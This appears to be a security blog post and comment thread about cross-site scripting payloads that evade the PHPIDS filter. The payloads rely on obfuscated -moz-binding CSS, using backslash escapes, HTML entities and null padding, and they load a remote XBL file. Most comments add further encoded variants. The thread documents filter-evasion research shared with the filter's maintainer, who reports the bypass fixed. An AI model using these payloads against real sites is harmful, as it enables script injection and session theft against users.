Awesome XSS

Hacking the PHPIDS again I found some cool XSS:-

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

I’ve moved it onto two lines for correct display.

Who’d have thought that Firefox would allow all that within the url and CSS properties πŸ˜€

11 Responses to “Awesome XSS”

  1. 排 Γ₯°¾ DaCat writes:

    awezome gareth!! πŸ˜€
    anyway, I thought .mario disabled the \char thing a while ago.. or maybe it was just the \a and \l πŸ˜›

    Greetz!

  2. Gareth Heyes writes:

    hehe thanks, you next? πŸ™‚

  3. Gareth Heyes writes:

    Check these out too πŸ™‚

    <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
    #98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
    #92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
    #110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
    #99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
    &#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
    &#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

    <div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
    #x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
    #x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
    #x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
    #x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
    &#x23&#x78&#x73&#x73&#x29>

  4. Gareth Heyes writes:

    <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

    <Q%^&*(£@!'” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

  5. Information security writes:

    A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities.

  6. .mario writes:

    Gareth you bandit πŸ˜‰ Hacking the PHPIDS while i visit my grams place *g*

    Well done and of course fixed by now!

    Thanks and Greetings,
    .mario

  7. Gareth Heyes writes:

    Hehe a hacker always attacks at the most inconvenient time πŸ˜‰

  8. Gareth Heyes writes:

    Believe it or not this is also a working mozbinding lol :-
    <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

  9. Gareth Heyes writes:

    <x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

  10. .mario writes:

    Eew… that’s indeed incredible! We need that ones for the xssDB!

  11. Gareth Heyes writes:

    I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-

    <div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

    Much easier than having to remember which characters can be escaped πŸ˜‰